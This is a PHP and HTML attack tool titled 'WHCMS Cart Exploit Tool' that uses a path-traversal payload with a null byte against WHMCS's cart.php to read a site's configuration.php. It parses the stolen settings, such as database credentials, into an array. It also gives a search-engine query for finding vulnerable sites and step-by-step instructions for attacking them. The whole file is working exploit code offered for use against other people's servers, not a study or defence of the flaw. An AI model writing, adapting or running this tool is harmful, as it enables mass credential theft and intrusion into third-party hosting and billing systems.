<?php
/**
* [TPK] & [shipcode] - theprojectxblog.net
* WHCMS Cart Exploit Tool
* #projectx
* http://www.exploit-db.com/exploits/17999/
* Develop By : Dr.KroOoZ || Root@TTGSa.Com
**/
# default payload
$payload = "cart.php?a=projectx&templatefile=../../../configuration.php%00";
# site checker
$check = '';
if(!empty($_GET['site']) && !empty($_GET['payload'])){
# yum yum!
$yum = array();
$payload = base64_decode($_GET['payload']);
$site = trim($_GET['site'],'/');
$http = stristr($site,'http://');
if($http){
$site = $http;
} else {
$site = "http://$site";
}
$exploit = "$site/$payload";
if ($stream = @fopen($exploit, 'r')) {
echo '<strong>' . $exploit . '</strong><br>';
$data = trim(stristr(stristr(stream_get_contents($stream), '<?php'), '?>', true), '<?php');
$data = explode(';',trim($data));
$data = array_filter($data);
foreach($data as $datum){
$datum = explode('=',$datum);
$yum[trim($datum[0])] = $datum[1];
}
echo '<pre>';
print_r($yum);
echo '</pre>';
# bug? causes apache to crash :O
// $pattern = '/<?php+(.|s)+?>/';
// preg_match($pattern, $data, $matches);
// var_dump($matches);
fclose($stream);
} else {
$check = "<a target='_new' href='$site/cart.php?a=projectx&templatefile=../../../configuration.php%00'> Press Here to Check Don't Forget See From Source</a>";
}
}
?>
<html>
<head>
<title>WHCMS Exploit Tool</title>
<style>
body, input { background: white; color: black; font-family: calibri; font-size: 0.9em; }
input[type=text] { width: 400px; } input { border: solid 1px white; }
span { display: inline-block; width: 50px; margin-right: 10px; }
a { text-decoration: none; color: red; } img { float: left; margin-right: 10px; }
</style>
<script>
var Base64 = {
// private property
_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// public method for encoding
encode : function (input) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = Base64._utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9+/=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
// private method for UTF-8 encoding
_utf8_encode : function (string) {
string = string.replace(/rn/g,"n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
}
else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
}
else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
},
// private method for UTF-8 decoding
_utf8_decode : function (utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;
while ( i < utftext.length ) {
c = utftext.charCodeAt(i);
if (c < 128) {
string += String.fromCharCode(c);
i++;
}
else if((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
i += 2;
}
else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}
}
return string;
}
}
</script>
</head>
<body>
<p align="left">
</p>
<form method='get' onSubmit="javascript:payload.value = Base64.encode(payload.value);">
<font face="Consolas" size="2"><center>WHCMS Config [ Exploit ] :D</center></font><p>
<p align="left">
<font size="2" face="Consolas">Target: </font><input type='text' name='site' value='put url without http://' style="color: #FF0000; font-family: Tahoma; border: 1px dashed #808080" size="25" />
<?php echo $check; ?><br/>
<font size="2" face="Consolas">Payload:</font><input type='text' name='payload' value='<?php echo $payload; ?>' style="color: #FF0000; font-family: Tahoma; border: 1px dashed #808080" size="25" />
<input type='submit' value='Exploit' style="color: red; font-family: Tahoma; border: 1px dashed #000000" />
</p>
</form>
<!-- brgzkreclwwp -->
<p align="center">Search For Site :
<a href="http://www.bing.com/search?q=powered+by+whmcompletesolution+cart.php&go=&form=QBRE&filt=all" target="_blank" >
Press Here</a></p>
<!-- How To USE -->
<div class="mydiv" style="color: black; font-family: Tahoma; border: 1px dashed red">
<body>
<p align="center" dir="ltr"><font face="Consolas" size="2">
+-------------------------------------------------------+</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2" color="#800000">How
To Use</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">1- Press in '
<font color="#FF0000">Search For Site</font> ' in new tab</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">2- But Site in Target
Then Press <font color="#FF0000">Exploit</font></font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">3- U Will Get Message
" <font color="#800000">Press Here to Check Don't Forget See From Source</font>
"</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">4- Site Will Open
Then See <font color="#FF0000">Source</font> .. </font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">And u Read The
<font color="#FF0000">Config</font> :D</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">Hint : See Source IN
<font color="#FF0000">FireFox</font> [ <font color="#800000">CTRL + U</font> ]</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">Or </font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">
<font color="#FF0000">Right Click</font> Then Press To [ <font color="#FF0000">
View Page Source</font> ]</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">
+-------------------------------------------------------+</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">
<font color="#FF0000">Develop</font> & <font color="#800000">Design</font> By :
Dr.KroOoZ | Mail : Root@TTGSa.Com !</font></p>
<p align="center" dir="ltr"><font face="Consolas" size="2">
+-------------------------------------------------------+</font></p>
</body>
<form>
<p align="center">
<input type="submit" value="Copyright" onClick="alert( 'Develop By : || Dr.KroOoZ || Mail : Root@TTGSa.CoM' )" style="color: #990033; font-family: Tahoma; font-size: 10pt; border: 1px solid #808080; background-color: #CCCCCC"></p>
</form>
</body>
</html>
